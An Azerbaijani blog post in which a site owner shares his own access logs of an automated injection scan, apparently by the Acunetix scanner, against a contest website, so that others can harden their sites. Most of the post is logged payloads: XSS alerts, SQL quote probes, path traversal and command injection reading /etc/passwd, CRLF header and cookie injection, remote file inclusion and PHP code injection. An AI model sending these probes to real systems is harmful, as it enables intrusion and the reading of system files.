MilliNet saytına injection cəhdləri.

November 22, 2009

Müsabiqə başlayan gündən saytda kiçik log sistemi quraşdırdım. Mənim üçün maraqlı idi sayta nə cür hücumlar ediləcək vəya belə deyək, ümumiyyətlə ediləcək mi? Log sistemi əsasən linki yoxlayır və link vasitəsi ilə mudaxilə (injection) cəhdlərini qeydə alır.

22 Oktyabrdan etibarən demək olar ki, hər gün sayta xirda müdaxilə cəhdləri edilirdi. Bəziləri linkdəki dəyişənlərə (variable) boşluq qoyurdu, bəziləri hər hansı bir simvolu. Bütün bunlar o qədər də maraqlı deyildi.

20 Noyabrda 193.135.156.253 ip-sindən ard-arda bir neçə injection cəhdi edildi. http://www.ip2location.com/ saytına görə bu İSVEÇRƏ ip-sidir. Ağlıma gələn ilk şey; “MilliNet müsabiqəsi isveçrəlilərin nəyinə lazımdır?” amma o vaxt kişilər yaxşı deyib “ilanın ağına da lənət qarasına da”.

Əslində bundan əvvəlki xırda cəhdlərdə də fərqli ölkələrin ip-ləri qeydə alınmışdı. Amma isveçrədən olan hücum daha maraqlı gəldi. Hücüm səhər saat 11:38-də başlayır və təxminən 15 dəqiqə davam edir. Təxminən hər 2 saniyədən bir fərqli ehtimallarla hücum edilir. Görünür bunu hansısa hazır script edir çünki əl ilə 2 saniyəyə bunları yazmaq biraz çətin məsəslədir.
Təbii ki, bütün cəhdlər uğursuz olub amma bu ehtimalları nəzərə alıb saytınız üçün əvvəlcədən təhlükəsizlik tədbirləri görə bilərsiniz.


20:11:2009 11:38:23 ==> index.php?sec=alert(828920777)%3B&id=10
20:11:2009 11:38:23 ==> index.php?sec=alert(814598898)%3B&id=10
20:11:2009 11:38:25 ==> index.php?sec=alert(155724332)%3B
20:11:2009 11:38:25 ==> index.php?sec=alert(428590302)%3B
20:11:2009 11:38:26 ==> index.php?sec=comment&id=alert(2063466684)%3B
20:11:2009 11:38:30 ==> index.php?sec='
20:11:2009 11:38:30 ==> index.php?sec='
20:11:2009 11:38:30 ==> index.php?sec='&id=10
20:11:2009 11:38:31 ==> index.php?sec='&id=10
20:11:2009 11:38:31 ==> index.php?sec=comment&id='
20:11:2009 11:38:31 ==> index.php?sec=comment&id='
20:11:2009 11:38:32 ==> index.php?sec=comment&id=alert(1296005040)%3B
20:11:2009 11:38:32 ==> index.php?sec=comment&id=alert(92331127)%3B
20:11:2009 11:38:34 ==> index.php?sec=comment&id='
20:11:2009 11:38:35 ==> index.php?sec=+%26cat+/etc/passwd%26
20:11:2009 11:38:35 ==> index.php?sec=+%26cat+/etc/passwd%26
20:11:2009 11:38:36 ==> index.php?sec=+%26cat+/etc/passwd%26&id=10
20:11:2009 11:38:36 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:37 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:37 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:41 ==> index.php?sec=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=../../../../../../../../etc/passwd&id=10
20:11:2009 11:38:42 ==> index.php?sec=../../../../../../../../etc/passwd&id=10
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&id=10
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&id=10
20:11:2009 11:38:49 ==> index.php?sec=comment&id=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:49 ==> index.php?sec=comment&id=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:49 ==> index.php?sec=../../../../../../../../etc/passwd
20:11:2009 11:38:53 ==> index.php?sec=
20:11:2009 11:38:53 ==> index.php?sec=
20:11:2009 11:38:54 ==> index.php?sec=&id=10
20:11:2009 11:38:54 ==> index.php?sec=&id=10
20:11:2009 11:38:54 ==> index.php?sec=comment&id=
20:11:2009 11:38:54 ==> index.php?sec=comment&id=
20:11:2009 11:38:56 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:57 ==> index.php?sec=+%26cat+/etc/passwd%26&id=10
20:11:2009 11:38:58 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&id=10
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&id=10
20:11:2009 11:39:00 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:03 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:09 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&id=10
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:13 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&id=10
20:11:2009 11:39:15 ==> index.php?sec=comment&id=
20:11:2009 11:39:16 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:16 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:17 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:39:17 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:23 ==> index.php?sec='&id=10
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:25 ==> index.php?sec='
20:11:2009 11:39:25 ==> index.php?sec='&id=10
20:11:2009 11:39:27 ==> index.php?sec='
20:11:2009 11:39:27 ==> index.php?sec='
20:11:2009 11:39:27 ==> index.php?sec='&id=10
20:11:2009 11:39:28 ==> index.php?sec='&id=10
20:11:2009 11:39:28 ==> index.php?sec=comment&id='
20:11:2009 11:39:30 ==> index.php?sec='
20:11:2009 11:39:31 ==> index.php?sec=comment&id='
20:11:2009 11:39:31 ==> index.php?sec=comment&id='
20:11:2009 11:39:32 ==> index.php?sec=)
20:11:2009 11:39:32 ==> index.php?sec=)&id=10
20:11:2009 11:39:33 ==> index.php?sec=comment&id=)
20:11:2009 11:39:33 ==> index.php?sec=comment&id=)
20:11:2009 11:39:35 ==> index.php?sec=)
20:11:2009 11:39:35 ==> index.php?sec=comment&id=)
20:11:2009 11:39:35 ==> index.php?sec=)&id=10
20:11:2009 11:39:37 ==> index.php?sec=
20:11:2009 11:39:38 ==> index.php?sec=&id=10
20:11:2009 11:39:38 ==> index.php?sec=&id=10
20:11:2009 11:39:38 ==> index.php?sec=comment&id=
20:11:2009 11:39:38 ==> index.php?sec=comment&id=
20:11:2009 11:39:39 ==> index.php?sec=comment&id=
20:11:2009 11:39:39 ==> index.php?sec=
20:11:2009 11:39:41 ==> index.php?sec=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=http://www.acunetix.com&id=10
20:11:2009 11:39:43 ==> index.php?sec=http://www.acunetix.com&id=10
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:44 ==> index.php?sec=http://www.acunetix.com
20:11:2009 11:40:14 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:14 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:15 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:17 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&mid=10
20:11:2009 11:40:23 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&mid=10
20:11:2009 11:40:34 ==> index.php?sec=&mid=10
20:11:2009 11:40:34 ==> index.php?sec=comment&mid=
20:11:2009 11:40:34 ==> index.php?sec=comment&mid=
20:11:2009 11:40:34 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:40:36 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&id=10
20:11:2009 11:40:36 ==> index.php?sec=&mid=10
20:11:2009 11:40:37 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:40:38 ==> index.php?sec=http://www.acunetix.com&mid=10
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:40 ==> index.php?sec=alert(1526387126)%3B&mid=10
20:11:2009 11:40:40 ==> index.php?sec=comment&mid=alert(1690613397)%3B
20:11:2009 11:40:40 ==> index.php?sec=>'>alert(356721300)%3B
20:11:2009 11:40:41 ==> index.php?sec=>'>alert(865097347)%3B&id=10
20:11:2009 11:40:43 ==> index.php?sec=alert(1257441162)%3B&mid=10
20:11:2009 11:40:43 ==> index.php?sec=comment&mid=
20:11:2009 11:40:46 ==> index.php?sec=http://www.acunetix.com&mid=10
20:11:2009 11:40:48 ==> index.php?sec=comment&mid=alert(1252845805)%3B
20:11:2009 11:40:48 ==> index.php?sec=comment&mid=alert(1492092584)%3B
20:11:2009 11:40:49 ==> index.php?sec=>'>alert(891277443)%3B
20:11:2009 11:40:50 ==> index.php?sec='&mid=10
20:11:2009 11:40:51 ==> index.php?sec='&mid=10
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=%27
20:11:2009 11:40:51 ==> index.php?sec=%27
20:11:2009 11:40:52 ==> index.php?sec=%27&id=10
20:11:2009 11:40:57 ==> index.php?sec=../../../../../../../../etc/passwd&mid=10
20:11:2009 11:40:57 ==> index.php?sec=../../../../../../../../etc/passwd&mid=10
20:11:2009 11:40:57 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=+%26cat+/etc/passwd%26&mid=10
20:11:2009 11:41:00 ==> index.php?sec=+%26cat+/etc/passwd%26&mid=10
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=+%0acat+/etc/passwd%0a
20:11:2009 11:41:03 ==> index.php?sec=+%0acat+/etc/passwd%0a
20:11:2009 11:41:04 ==> index.php?sec=+%0acat+/etc/passwd%0a&id=10
20:11:2009 11:41:04 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:06 ==> index.php?sec=/some_inexistent_file_with_long_name
20:11:2009 11:41:06 ==> index.php?sec=/some_inexistent_file_with_long_name&id=10
20:11:2009 11:41:06 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&mid=10
20:11:2009 11:41:06 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&mid=10
20:11:2009 11:41:06 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:06 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:07 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:08 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:41:08 ==> index.php?sec=&mid=10
20:11:2009 11:41:08 ==> index.php?sec=&mid=10
20:11:2009 11:41:08 ==> index.php?sec=/some_inexistent_file_with_long_name
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:09 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:41:10 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:12 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:41:16 ==> index.php?sec='&mid=10
20:11:2009 11:41:17 ==> index.php?sec=comment&mid='
20:11:2009 11:41:17 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec='&mid=10
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=)&mid=10
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:19 ==> index.php?sec='&mid=10
20:11:2009 11:41:20 ==> index.php?sec=comment&mid='
20:11:2009 11:41:20 ==> index.php?sec='&mid=10
20:11:2009 11:41:21 ==> index.php?sec=)&mid=10
20:11:2009 11:41:25 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&mid=10
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:28 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&id=10
20:11:2009 11:41:28 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:28 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:29 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&mid=10
20:11:2009 11:42:12 ==> index.php?sec=>'>alert(22094292)%3B&id=10
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(313490729)%3B
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(256038863)%3B
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(34961168)%3B
20:11:2009 11:42:13 ==> index.php?sec=>'>alert(909768351)%3B&mid=10
20:11:2009 11:42:13 ==> index.php?sec=comment&mid=>'>alert(1092862869)%3B
20:11:2009 11:42:13 ==> index.php?sec=comment&mid=>'>alert(1131569076)%3B
20:11:2009 11:42:15 ==> index.php?sec=%27&id=10
20:11:2009 11:42:15 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:15 ==> index.php?sec=%27&mid=10
20:11:2009 11:42:15 ==> index.php?sec=%27&mid=10
20:11:2009 11:42:16 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:16 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:16 ==> index.php?sec=>'>alert(591925021)%3B&mid=10
20:11:2009 11:42:18 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:18 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:18 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:27 ==> index.php?sec=/some_inexistent_file_with_long_name&id=10
20:11:2009 11:42:27 ==> index.php?sec=comment&id=/some_inexistent_file_with_long_name
20:11:2009 11:42:27 ==> index.php?sec=comment&id=/some_inexistent_file_with_long_name
20:11:2009 11:42:27 ==> index.php?sec=/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:42:28 ==> index.php?sec=/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:42:28 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:28 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:28 ==> index.php?sec=+%0acat+/etc/passwd%0a&id=10
20:11:2009 11:42:29 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:29 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:29 ==> index.php?sec=+%0acat+/etc/passwd%0a&mid=10
20:11:2009 11:42:30 ==> index.php?sec=+%0acat+/etc/passwd%0a&mid=10
20:11:2009 11:42:30 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:30 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:30 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:31 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:42:31 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:42:32 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:33 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:35 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:27 ==> index.php?sec=%2527
20:11:2009 11:43:27 ==> index.php?sec=%2527
20:11:2009 11:43:28 ==> index.php?sec=%2527&id=10
20:11:2009 11:43:28 ==> index.php?sec=%2527&id=10
20:11:2009 11:43:28 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:28 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:31 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:32 ==> index.php?sec=>">alert(2112528622)%3B
20:11:2009 11:43:32 ==> index.php?sec=>">alert(1879597226)%3B
20:11:2009 11:43:32 ==> index.php?sec=>">alert(1838808769)%3B&id=10
20:11:2009 11:43:33 ==> index.php?sec=comment&id=>">alert(2057693447)%3B
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:43:34 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:43:34 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:34 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:35 ==> index.php?sec=comment&id=>">alert(1553532672)%3B
20:11:2009 11:43:35 ==> index.php?sec=comment&id=>">alert(2040900903)%3B
20:11:2009 11:43:36 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&id=10
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&id=10
20:11:2009 11:43:37 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:37 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60&id=10
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60&id=10
20:11:2009 11:43:38 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:43:38 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:43:40 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:40 ==> index.php?sec=%60cat+/etc/passwd%60
20:11:2009 11:43:40 ==> index.php?sec=>">alert(359809996)%3B&id=10
20:11:2009 11:43:41 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:44:13 ==> index.php?sec=%2527&mid=10
20:11:2009 11:44:13 ==> index.php?sec=%2527&mid=10
20:11:2009 11:44:13 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:13 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:13 ==> index.php?sec="
20:11:2009 11:44:14 ==> index.php?sec="
20:11:2009 11:44:14 ==> index.php?sec="&id=10
20:11:2009 11:44:15 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&mid=10
20:11:2009 11:44:15 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&mid=10
20:11:2009 11:44:15 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:15 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:16 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:16 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:17 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:17 ==> index.php?sec=%60cat+/etc/passwd%60&mid=10
20:11:2009 11:44:17 ==> index.php?sec=%60cat+/etc/passwd%60&mid=10
20:11:2009 11:44:17 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:18 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:18 ==> index.php?sec=cat+/etc/passwd&id=10
20:11:2009 11:44:19 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:20 ==> index.php?sec=>">alert(915487236)%3B&mid=10
20:11:2009 11:44:20 ==> index.php?sec=>">alert(1793635864)%3B&mid=10
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=>">alert(289191039)%3B
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=>">alert(1195476607)%3B
20:11:2009 11:44:21 ==> index.php?sec=comment&mid=>">alert(1705370242)%3B
20:11:2009 11:44:21 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:21 ==> index.php?sec=cat+/etc/passwd
20:11:2009 11:44:21 ==> index.php?sec=cat+/etc/passwd
20:11:2009 11:44:21 ==> index.php?sec=alert(1693522596)%3B&id=10
20:11:2009 11:44:23 ==> index.php?sec=alert(1571845125)%3B
20:11:2009 11:44:24 ==> index.php?sec=alert(910874829)%3B
20:11:2009 11:44:50 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:44:50 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:44:53 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&id=10
20:11:2009 11:44:56 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:44:56 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:57 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:57 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec="&id=10
20:11:2009 11:44:58 ==> index.php?sec=comment&id="
20:11:2009 11:44:58 ==> index.php?sec=comment&id="
20:11:2009 11:44:58 ==> index.php?sec="&mid=10
20:11:2009 11:44:59 ==> index.php?sec="&mid=10
20:11:2009 11:44:59 ==> index.php?sec=comment&mid="
20:11:2009 11:44:59 ==> index.php?sec=comment&mid="
20:11:2009 11:44:59 ==> index.php?sec=comment&id="
20:11:2009 11:45:01 ==> index.php?sec=comment&mid="
